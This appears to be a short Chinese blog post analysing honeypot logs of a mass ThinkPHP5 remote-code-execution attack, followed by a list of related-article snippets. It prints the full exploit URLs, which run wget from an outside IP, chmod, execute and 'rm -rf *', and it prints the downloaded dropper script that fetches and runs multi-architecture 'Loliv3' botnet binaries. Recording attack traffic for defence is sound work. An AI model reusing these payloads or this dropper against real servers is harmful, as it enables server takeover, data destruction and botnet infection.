php rce,批量thinkphp5的RCE漏洞利用
蜜罐捕获攻击
212.237.14.55 - - [22/Dec/2018:13:17:50 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93.197.215/sh;%20chmod%20777%20sh;%20./sh;%20rm%20-rf%20* HTTP/1.1" 404 162 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64"
212.237.14.55 - - [22/Dec/2018:17:59:48 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93.197.215/php;chmod%20777%20php;./php;rm%20-rf%20* HTTP/1.1" 404 162 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64"
利用RCE获取远程服务器文件:
http://142.93.197.215/php
binarys="mips mpsl arm arm5 arm6 arm7 sh4 ppc x86 arc"
server_ip="142.93.197.215"
binname="Loliv3"
execname="LoliSecHoe"
for arch in $binarys
do
cd /tmp
wget http://$server_ip/$binname.$arch -O $execname
chmod 777 $execname
./$execname Think.php
rm -rf $execname
done
写入并执行
Loliv3.arc
Loliv3.arm
Loliv3.arm5
Loliv3.arm6
Loliv3.arm7
Loliv3.mips
Loliv3.mpsl
Loliv3.ppc
Loliv3.sh4
Loliv3.x86
php
连接Think.php
php rce,批量thinkphp5的RCE漏洞利用相关推荐
- thinkphp5.0.22漏洞利用
一.搭建环境 phpstudy的版本大于5.0 解压源码到www下 浏览器访问 127.0.0.1/thinkphp/public/index.php 漏洞利用 ?s=.|think\config/g ...
- webmin RCE漏洞利用及分析
Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作. 利用条件:webmin <= 1.910 原因:官网 Sou ...
- WiFiDemon – iOS WiFi RCE 0-Day漏洞利用
近日,ZecOps安全研究人员发现了iOS WiFi命名漏洞的零交互攻击利用方式,可以用来远程劫持iPhone设备. Wi-Fi-Demon Wifid 是处理与WiFi连接相关的协议的系统daemo ...
- RCE代码及命令执行漏洞简解
在 Web 应用中有时候程序员为了考虑灵活性.简洁性,会在代码调用 代码或命令执行函数去处理.比如当应用在调用一些能将字符串转化成代 码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏 洞 ...
- 30.WEB漏洞-RCE代码及命令执行漏洞
30:WEB漏洞-RCE代码及命令执行漏洞 参考文章:https://www.cnblogs.com/zhengna/p/15775737.html 本文为博主学习复现笔记 文章目录 30:WEB漏洞 ...
- Spring 框架更新了一条可能造成 RCE(远程命令执行漏洞)
今天 Spring 框架更新了一条可能造成 RCE(远程命令执行漏洞)的问题代码,如图: 随即在国内安全圈炸开了锅,大家纷纷转发一张图: 上次因为核弹级漏洞 log4j2 的 POC 公开,大批企业为 ...
- Drupal 7.31SQL注入getshell漏洞利用详解及EXP
0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去. 0x0 ...
- metasploit 快速入门(三) 服务端漏洞利用
目录 简介 01 攻击Linux服务器 02 SQL 注入 03 shell类型 04 攻击Windows 服务器 05 利用公用服务 06 MS17-010 永恒之蓝 SMB远程代码执行Window ...
- [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
最新文章
- Hadoop概念学习系列之Java调用Shell命令和脚本,致力于hadoop/spark集群(三十六)...
- 扒一扒 JVM 的垃圾回收机制,拿大厂offer少不了它!
- 使用scrapy抓取股票代码
- 王晖:以Linux为核心扩展云核心组件
- Google布隆过滤器与Redis布隆过滤器详解
- MacOS 的 Automator 实用案例详解
- 通过暴露出来的OA和github信息拿Shell
- window使用技巧记录
- 辩论计算机未来不能取代书本的问题,电脑不能取代书本辩论会材料.doc
- 排列生成算法--C++
- python优先级排序_Python Numpy重新排列双向排序
- linux查看电脑硬件信息,Linux下查看电脑硬件配置【转】
- cocos2d-x中实现不规则按钮的点击效果
- mysql选择联合索引还是单索引?索引列应该使用哪一个最有效?深入測试探讨...
- 编程基本功:不要患上词汇匮乏症
- 【软件过程改进 学习笔记】过程思维 ( 软件危机 | 软件过程 | 过程改进 | 过程思维 | 过程描述 | ISO 9000 | 6σ | PCM | CMMI )
- iOS开发者必备: 五大编程类工具
- 分布式事务之柔性事务
- OBS Studio安装教程以及录制等详细配置
- 使用 Wrapper 自定义SQL